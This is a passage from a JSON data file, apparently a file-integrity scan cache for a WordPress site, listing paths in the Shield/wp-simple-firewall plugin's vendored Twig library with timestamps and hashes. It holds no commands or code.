:{\"d\":1567917024,\"h\":\"2afc9b891fea3ecef2133b1184a7e060\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Array.php\":{\"d\":1567917024,\"h\":\"acca240be16008563b01161a6a922592\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Name.php\":{\"d\":1567917024,\"h\":\"14fef2e2519c6465afbe540252fd983c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Parent.php\":{\"d\":1567917024,\"h\":\"32794ff97e17f73dc017f16994e70b8d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/AssignName.php\":{\"d\":1567917024,\"h\":\"b23bacc7daa066580bafbb184ed3c30f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/MethodCall.php\":{\"d\":1567917024,\"h\":\"ac7f8286538e20cefafc9eeb376c653f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/TempName.php\":{\"d\":1567917024,\"h\":\"46961e0750fca62408ed5a3c37d98d87\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/NullCoalesce.php\":{\"d\":1567917024,\"h\":\"8bc235ac05cb6555da8b1578cfce1202\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Binary.php\":{\"d\":1567917024,\"h\":\"c56d590a0b11cb204c27965802f542a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/GetAttr.php\":{\"d\":1567917024,\"h\":\"8610ae5fcc509a77c0d8a1f34076863b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/ExtensionReference.php\":{\"d\":1567917024,\"h\":\"8b14d518a26c60fd5b63cebfdc72dcb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Constant.php\":{\"d\":1567917024,\"h\":\"1799976844e1d589e8b42144040015fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/BlockReference.php\":{\"d\":1567917024,\"h\":\"54c0d3c943d3e6f224234669bbaa076d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Unary.php\":{\"d\":1567917024,\"h\":\"42f8324645ca23fcffab442ef2205c4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression\\/Filter.php\":{\"d\":1567917024,\"h\":\"c6895989d8ebaa867d86738f02cac94c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/AutoEscape.php\":{\"d\":1567917024,\"h\":\"567440282e90ad48390bbc38760e73e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Text.php\":{\"d\":1567917024,\"h\":\"2ceac17b4de1dd2f2a4c528550fb9b83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Flush.php\":{\"d\":1567917024,\"h\":\"ca578f22204072bb6784755eda23058c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/ForLoop.php\":{\"d\":1567917024,\"h\":\"e3a85fbc1a53256d72e73a47cc8cc285\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/SetTemp.php\":{\"d\":1567917024,\"h\":\"0a4391961609db681888f3f62c8cb9e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Expression.php\":{\"d\":1567917024,\"h\":\"02ec7a8e9711e15867449575ede9f62c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Embed.php\":{\"d\":1567917024,\"h\":\"72cab50fd3878b3384249f1bf950b3de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/If.php\":{\"d\":1567917024,\"h\":\"f877f342873179aba2901b88367e9d63\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Import.php\":{\"d\":1567917024,\"h\":\"7b73350a4337407e4d6483ffcaab6f72\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/With.php\":{\"d\":1567917024,\"h\":\"16b1d072dc99c58079cf148f66391546\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/For.php\":{\"d\":1567917024,\"h\":\"d8f7034152c131f5343f7df3e7c90b02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/CheckSecurity.php\":{\"d\":1567917024,\"h\":\"e58ad9e711d95c58724e3f460f2ec785\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Block.php\":{\"d\":1567917024,\"h\":\"f8ba844823cd01212ff4c2eeb4bd5173\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Include.php\":{\"d\":1567917024,\"h\":\"88d8a4b5ba6e88c695f38c95addca309\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Deprecated.php\":{\"d\":1567917024,\"h\":\"1781466f91c8ff87c35027deaf4067c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Spaceless.php\":{\"d\":1567917024,\"h\":\"c951b7a8810c22d79630239725087bba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Do.php\":{\"d\":1567917024,\"h\":\"871cddc4995f464d1595902ebe13a09b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Set.php\":{\"d\":1567917024,\"h\":\"ee6843b1c44064f861b52bc2c8a4e9ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Print.php\":{\"d\":1567917024,\"h\":\"72cda7dba065a6b014ad6ef7dc81c404\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Macro.php\":{\"d\":1567917024,\"h\":\"3c43a99961404047611ec1bfbdb2bc20\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Module.php\":{\"d\":1567917024,\"h\":\"3a4cea9d80361e47c146b3956b713e06\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/BlockReference.php\":{\"d\":1567917024,\"h\":\"22705486f37e7e25ed2a0fcd9dd76205\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Sandbox.php\":{\"d\":1567917024,\"h\":\"314467c75e7bb20a8c03b0afb311e21e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/SandboxedPrint.php\":{\"d\":1567917024,\"h\":\"f9c9f7b960f2ff2025785f1ac3e26d6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node\\/Body.php\":{\"d\":1567917024,\"h\":\"f0f8df41745713e81dfaa75cc9265a3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Util\\/DeprecationCollector.php\":{\"d\":1567917024,\"h\":\"841670da4d34353fde12664debad9aa9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Util\\/TemplateDirIterator.php\":{\"d\":1567917024,\"h\":\"77b59f8d0098cde86db5c2b5fdf6634e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Function\\/Function.php\":{\"d\":1567917024,\"h\":\"592b4962a8cb86a39ddfe863b9b0aee3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Function\\/Node.php\":{\"d\":1567917024,\"h\":\"cd46095566edba7cc788d1dab5cd4be7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Function\\/Method.php\":{\"d\":1567917024,\"h\":\"73e2b6c6f1ee78bbdcd33f8bf91c64a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Cache\\/Filesystem.php\":{\"d\":1567917024,\"h\":\"27728fef0414b2c8ce6edba11274ad81\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Cache\\/Null.php\":{\"d\":1567917024,\"h\":\"adf465a2c9d22aa4718b879fd0c0f9fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityPolicy.php\":{\"d\":1567917024,\"h\":\"8f6906681f3dad4af51b3820fbf8edc6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityPolicyInterface.php\":{\"d\":1567917024,\"h\":\"f01595f594858048d26829875b74a514\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityError.php\":{\"d\":1567917024,\"h\":\"473ddcf4c14aa80c8fbc36842a265bc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityNotAllowedFunctionError.php\":{\"d\":1567917024,\"h\":\"774c190dd87be83c9ebac19544fa3c38\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityNotAllowedTagError.php\":{\"d\":1567917024,\"h\":\"8361f5eeaee1f42ab335dacf0999ead2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityNotAllowedPropertyError.php\":{\"d\":1567917024,\"h\":\"e5164378ab0e6f7e06aac81ef51ab6c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityNotAllowedMethodError.php\":{\"d\":1567917024,\"h\":\"4247d0dc4002dc3285d5d7a7831b567e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Sandbox\\/SecurityNotAllowedFilterError.php\":{\"d\":1567917024,\"h\":\"4230f8c32c9a1d9fc9741523e95d55f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParserBroker.php\":{\"d\":1567917024,\"h\":\"dfe0fb95128967ba0d2822e742310a99\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Markup.php\":{\"d\":1567917024,\"h\":\"34d62ee5481c94ec179f183c7e33164e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TemplateWrapper.php\":{\"d\":1567917024,\"h\":\"6c53c78587248aed3b245aee02686259\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeInterface.php\":{\"d\":1567917024,\"h\":\"0eee13147783b69c7abd5b2c1958eac5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Lexer.php\":{\"d\":1567917024,\"h\":\"bdbb2b34e421a070b404ed446dae5da4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Function.php\":{\"d\":1567917024,\"h\":\"e7f1f51d835a26fdab7536254a2cdab5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/RuntimeLoaderInterface.php\":{\"d\":1567917024,\"h\":\"9fc74752e3ccc9765210d1fba2ddc0d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TestInterface.php\":{\"d\":1567917024,\"h\":\"f9dd5060017c46c5a87995d740ef2c27\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Test.php\":{\"d\":1567917024,\"h\":\"0ecd2cd7e2d45a4e9a98c4e02c098de9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/ExpressionParser.php\":{\"d\":1567917024,\"h\":\"596a3e70da0d05a703269b1038491a8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/LexerInterface.php\":{\"d\":1567917024,\"h\":\"64bfc41b1fe5c31654465feda90cc872\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/ExistsLoaderInterface.php\":{\"d\":1567917024,\"h\":\"c718685eebc9e55023f7efefac0658ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/LoaderInterface.php\":{\"d\":1567917024,\"h\":\"17fab939689d57c0359a9fc910eb9f15\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Source.php\":{\"d\":1567917024,\"h\":\"b0c94a75545adf1564c6aec5724c8a25\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/SimpleFunction.php\":{\"d\":1567917024,\"h\":\"65a3dd4008d980d70b15107352687a58\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Autoloader.php\":{\"d\":1567917024,\"h\":\"eb9478b25ed1364b5d95d27a0ad45481\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenStream.php\":{\"d\":1567917024,\"h\":\"afb3054b7bfe34c261a20df93807f8c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeOutputInterface.php\":{\"d\":1567917024,\"h\":\"e89f45756e52660402470855d4288e55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/CompilerInterface.php\":{\"d\":1567917024,\"h\":\"f879825a8eb81494fe560951b7315b1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/FunctionCallableInterface.php\":{\"d\":1567917024,\"h\":\"3e69f85ce1f6333e1eabaccc20d32faf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/SourceContextLoaderInterface.php\":{\"d\":1567917024,\"h\":\"f13f494d889b1d42b6aa3360f4cee0f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Extension.php\":{\"d\":1567917024,\"h\":\"56158c52565b15eaab10dc772e4e2dbd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/SimpleFilter.php\":{\"d\":1567917024,\"h\":\"7448c500ff00e371ee4bb980d2536030\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Template.php\":{\"d\":1567917024,\"h\":\"43e5bba4755d56197abd26c6e937417b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Node.php\":{\"d\":1567917024,\"h\":\"0cd57326fc3e51779ffae9bc156792c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParser.php\":{\"d\":1567917024,\"h\":\"c9302daee438f554ad386d08b70d03a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/FactoryRuntimeLoader.php\":{\"d\":1567917024,\"h\":\"965a0baf7212fef6ea2e800237c4cf13\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TestCallableInterface.php\":{\"d\":1567917024,\"h\":\"fc239b277f8b479666009cfecf82a42b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParserBrokerInterface.php\":{\"d\":1567917024,\"h\":\"e1e629fbb3094426dd875e1c58baf659\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeVisitorInterface.php\":{\"d\":1567917024,\"h\":\"55123f74d0421add26460fdb57cb89fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/CacheInterface.php\":{\"d\":1567917024,\"h\":\"b7b72185b7e1d7725a04f59c7dd7aedc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TemplateInterface.php\":{\"d\":1567917024,\"h\":\"511694c1bc7af224c35c0433293aec3b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Compiler.php\":{\"d\":1567917024,\"h\":\"85db6f2fc0eac55f14a1e4c8fa9a241e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/FilterInterface.php\":{\"d\":1567917024,\"h\":\"4d1ee1bc4f07665ad94fd7fca9082352\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Error.php\":{\"d\":1567917024,\"h\":\"e041f9feb249c738f0fe66d8bddb829d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/BaseNodeVisitor.php\":{\"d\":1567917024,\"h\":\"1ed9b177b55a0d479cbe34b63dea580b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/ContainerRuntimeLoader.php\":{\"d\":1567917024,\"h\":\"95d433f3c7de31318ff0e1fd6585c1f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/ExtensionInterface.php\":{\"d\":1567917024,\"h\":\"993c47854290a867168ee45e090ea539\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeCaptureInterface.php\":{\"d\":1567917024,\"h\":\"134adf58815fb44f921645e13318c9c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Environment.php\":{\"d\":1567917024,\"h\":\"f641a8e9b4eb0405ce2d416759bb6c6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Filter.php\":{\"d\":1567917024,\"h\":\"02f93c5a401fcdfe12aadbfb705405cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/TokenParserInterface.php\":{\"d\":1567917024,\"h\":\"acd4e709ef52b069abb88593d163e65f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/SimpleTest.php\":{\"d\":1567917024,\"h\":\"140c0ae0d35491457f251fab039ed014\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/FilterCallableInterface.php\":{\"d\":1567917024,\"h\":\"111ca315f23d3ae1355c155d1392bcaa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Token.php\":{\"d\":1567917024,\"h\":\"c33584305776aa03342690aa0381aa6f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/ParserInterface.php\":{\"d\":1567917024,\"h\":\"4af85028cb2fa68a645350153f9b34ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/FunctionInterface.php\":{\"d\":1567917024,\"h\":\"3da376a63add0412aacb80e4287369fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/FileExtensionEscapingStrategy.php\":{\"d\":1567917024,\"h\":\"7897962ea6cece13730b91dc26c5d8ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/Parser.php\":{\"d\":1567917024,\"h\":\"2280a4f28af7447163155cbb59547c01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/lib\\/Twig\\/NodeTraverser.php\":{\"d\":1567917024,\"h\":\"def08b94d6df738637708a70c5602e84\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/NodeVisitor\\/ProfilerNodeVisitor.php\":{\"d\":1567917024,\"h\":\"acc3e10830d101f5849d6ee26f2ee4a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Node\\/EnterProfileNode.php\":{\"d\":1567917024,\"h\":\"24b7fd54ba4b1254c6d19ee5